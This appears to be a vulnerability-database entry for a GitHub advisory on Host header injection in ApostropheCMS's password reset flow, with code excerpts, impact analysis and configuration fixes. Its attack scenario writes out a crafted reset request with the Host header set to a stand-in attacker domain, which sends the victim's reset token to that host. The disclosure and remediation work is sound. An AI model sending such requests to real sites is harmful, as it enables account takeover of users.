Severity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Primary rating from Vendor (https://github.com/apostrophecms/apostrophe) · only source for this CVE.
CVSS VectorVendor: https://github.com/apostrophecms/apostrophe
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Lifecycle Timeline
3DescriptionCVE.org
Summary
ApostropheCMS's password reset flow constructs the reset URL using req.hostname, which is derived directly from the attacker-controlled HTTP Host header when apos.baseUrl is not explicitly configured. An unauthenticated attacker who knows a victim's email address can send a crafted reset request that causes the application to email the victim a reset link pointing to the attacker's domain. When the victim clicks the link, the valid reset token is delivered to the attacker, enabling full account takeover.
Affected Component
modules/@apostrophecms/login/index.js - resetRequest route Precondition: passwordReset: true is set and apos.baseUrl is not configured.
Vulnerability Details
The setPrefixUrls middleware (i18n layer) builds req.baseUrl using req.hostname:
// Simplified from i18n middleware
req.baseUrl = `${req.protocol}://${req.hostname}`;
req.absoluteUrl = req.baseUrl + req.url;The resetRequest handler then passes this tainted value directly into URL construction:
const parsed = new URL(
req.absoluteUrl, // ← tainted by attacker's Host header
self.apos.baseUrl
? undefined
: `${req.protocol}://${req.hostname}${port}` // ← also tainted
);
parsed.pathname = '/login';
parsed.searchParams.append('reset', reset); // real, valid token
parsed.searchParams.append('email', user.email);
await self.email(..., { url: parsed.toString() }, ...);
// Email sent to victim with URL pointing to attacker-controlled domainWhen apos.baseUrl is configured, it is used unconditionally and the attacker's Host header is ignored - that path is not vulnerable.
Attack Scenario
- Attacker identifies a valid user email (e.g. from the site's public interface).
- Attacker sends:
POST /api/v1/login/reset-request
Host: evil.attacker.com
Content-Type: application/json
{"email": "victim@example.com"}- The application emails the victim:
Click here to reset your password:
http://evil.attacker.com/login?reset=TOKEN&email=victim@example.com- Victim clicks the link; attacker's server captures
TOKEN. - Attacker calls the real target's reset endpoint with the captured token and
sets a new password - full account takeover.
Preconditions
passwordReset: trueconfigured in login module options (opt-in)apos.baseUrlis not set (common in development and some production deployments)- Attacker knows or can enumerate a valid account email
Impact
Full account takeover of any account whose email address is known to the attacker. No authentication or interaction beyond sending a single HTTP request is required from the attacker. The victim need only click a link in a legitimate-looking password reset email from their own site.
Remediation
Operators (immediate): Always set apos.baseUrl in your configuration:
// app.js or module configuration
modules: {
'@apostrophecms/express': {
options: {
baseUrl: 'https://yourdomain.com'
}
}
}Framework fix (recommended): The resetRequest route should refuse to proceed if apos.baseUrl is not configured, rather than falling back to the tainted req.hostname. Example:
// In resetRequest handler
if (!self.apos.baseUrl) {
throw self.apos.error(
'invalid',
'apos.baseUrl must be configured to enable password reset'
);
}
const parsed = new URL(self.loginUrl(), self.apos.baseUrl);This eliminates the attacker-controlled input entirely from the URL construction path.
References
AnalysisAI
Account takeover in ApostropheCMS password reset flow allows remote attackers to steal password reset tokens via Host header injection. When apos.baseUrl is not configured (common in development and some production deployments), the password reset mechanism trusts the attacker-controlled HTTP Host header to construct reset URLs, causing victims to receive legitimate reset emails with links pointing to attacker domains. Clicking the link delivers valid reset tokens to the attacker, enabling full account compromise. CVSS 8.1 (High) with network attack vector, low complexity, and no privileges required. No public exploit identified at time of analysis, though the vulnerability is straightforward to exploit given the detailed technical disclosure in the GitHub security advisory.
Technical ContextAI
The vulnerability exists in the password reset flow of ApostropheCMS's login module (modules/@apostrophecms/login/index.js). The root cause is improper input validation (CWE-20) and weak password recovery mechanism design (CWE-640). When the apos.baseUrl configuration option is not set, the setPrefixUrls middleware constructs req.baseUrl and req.absoluteUrl using req.hostname, which Node.js/Express derives directly from the HTTP Host header without validation. The resetRequest route handler then uses this tainted value as the base URL for password reset links sent via email. The code constructs URLs using 'new URL(req.absoluteUrl, fallback)' where both parameters can be attacker-controlled when baseUrl is missing. This is a classic Host header injection vulnerability affecting web frameworks that trust client-supplied headers for URL construction. The vulnerability affects npm package 'apostrophe' versions up to and including 4.29.0 according to CPE data.
RemediationAI
No vendor-released patch identified at time of analysis - affected versions through 4.29.0 remain vulnerable per GitHub advisory. Immediate mitigation requires configuration change rather than upgrade: operators must explicitly set apos.baseUrl in their ApostropheCMS configuration to prevent the application from trusting the Host header. Add to app.js or module configuration: modules: { '@apostrophecms/express': { options: { baseUrl: 'https://yourdomain.com' } } }. Replace 'https://yourdomain.com' with the canonical production domain. This configuration change completely eliminates attacker control over reset URL construction by forcing the application to use the hardcoded baseUrl value. As a defense-in-depth measure, organizations can also disable password reset functionality if not required by setting passwordReset: false in login module options, though this impacts legitimate user password recovery. Monitor the GitHub advisory at https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-gf43-24g3-5hw2 and https://github.com/advisories/GHSA-gf43-24g3-5hw2 for vendor patch releases. The advisory recommends a code-level fix where resetRequest refuses to proceed when apos.baseUrl is missing, which would eliminate the vulnerability at the framework level.
Same weakness CWE-20 – Improper Input Validation
View allSame technique Code Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-36571
GHSA-gf43-24g3-5hw2